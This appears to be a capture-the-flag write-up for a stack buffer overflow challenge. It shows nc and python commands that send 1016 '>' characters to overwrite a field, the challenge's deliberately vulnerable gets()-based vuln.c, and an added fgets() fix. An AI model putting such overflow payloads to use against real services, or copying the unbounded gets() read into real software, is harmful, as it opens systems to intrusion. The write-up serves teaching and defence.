bx01

Blind

Connecting with nc puzzler7.imaginaryctf.org 1111, we're greeted with the following:

$ nc puzzler7.imaginaryctf.org 1111   
[EXCEPTION] Angle Brackets unterminated.

If we send "hi" after this message, we get back the response "[MESSAGE] Exception unresolved. Exiting."

Let's use Python to see if there's a limit to how much data we can send:

$ python3 -c 'print("A" * 2000)' | nc puzzler7.imaginaryctf.org 1111
[EXCEPTION] Angle Brackets unterminated.
[MESSAGE] Exception unresolved. Exiting.
*** stack smashing detected ***: terminated

With a bit of trial and error, we find we can send up to 1016 characters without triggering the "*** stack smashing detected ***: terminated" error.

Putting this together with the hint from the exception about unterminated angle brackets, let's send 1016 ">" characters and see what happens:

$ python3 -c 'print(">" * 1016)' | nc puzzler7.imaginaryctf.org 1111
[EXCEPTION] Angle Brackets unterminated.
ictf{sourceless_binaryless_pwn_lul}

We get the flag ictf{sourceless_binaryless_pwn_lul}!

Unintended?

Despite the flag telling us there was no binary or source, when the challenge was published it had a link to download this vuln.c file:

#include <stdio.h>

extern gets;

struct contrived_chall {
  char lolololol[1000];
  long code;
};

void (*lolol)(char*) = &puts;
void (*lololol)(char*) = &gets;

int main() {
  struct contrived_chall lol;
  setvbuf(stdin, NULL, 2, 0);
  setvbuf(stdout, NULL, 2, 0);
  lolol("[EXCEPTION] Angle Brackets unterminated.");
  lololol(lol.lolololol);
  if (lol.code == 0x3e3e3e3e3e3e3e3e) {
    FILE *fp;
    fp = fopen("flag.txt", "r");
    fscanf(fp, "%s", lol.lolololol);
    lolol(lol.lolololol);
  }
  lolol("[MESSAGE] Exception unresolved. Exiting.");
}

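With the source, we can see that the input needs any 1000 characters to fill the lolololol buffer, followed by 8 ">" characters (byte 0x3e) that land in code and make it equal 0x3e3e3e3e3e3e3e3e.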
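The fix for the overflow shown in vuln.c, as an added example that is not part of the original challenge or writeup: the same struct layout read with a bounded fgets() instead of gets(), fed the 1016 ">" characters from the walkthrough. The names chall, buf, code_offset, read_bounded and demo_with_1016_brackets are made up for this example, and the input is constructed in a temporary file rather than read from a socket.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Same layout as struct contrived_chall in vuln.c; field names are
   renamed here for readability (assumption of this example). */
struct chall {
  char buf[1000];
  long code;
};

/* Distance from the start of buf to code: how many filler bytes an
   unbounded read writes before it starts overwriting the field. */
size_t code_offset(void) { return offsetof(struct chall, code); }

/* Hardened read: fgets() stores at most sizeof(buf) bytes including the
   terminating NUL, so it cannot write into code. Returns code afterwards. */
long read_bounded(FILE *in) {
  struct chall c;
  c.code = 0;
  if (fgets(c.buf, sizeof c.buf, in) == NULL)
    c.buf[0] = '\0';
  c.buf[strcspn(c.buf, "\n")] = '\0'; /* drop the newline if one was read */
  return c.code;
}

/* Constructed input: 1016 '>' characters plus a newline, matching the
   line sent in the walkthrough. Returns code after the bounded read. */
long demo_with_1016_brackets(void) {
  char payload[1018];
  memset(payload, '>', 1016);
  payload[1016] = '\n';
  payload[1017] = '\0';
  FILE *in = tmpfile();
  if (in == NULL) return -1;
  fputs(payload, in);
  rewind(in);
  long code = read_bounded(in);
  fclose(in);
  return code;
}

int main(void) {
  printf("offset of code: %zu\n", code_offset());
  printf("code after bounded read: %#lx\n",
         (unsigned long)demo_with_1016_brackets());
  return 0;
}
```

With the bounded read, the excess input stays unread in the stream and code keeps its initial value, so the flag branch in vuln.c would not be reached.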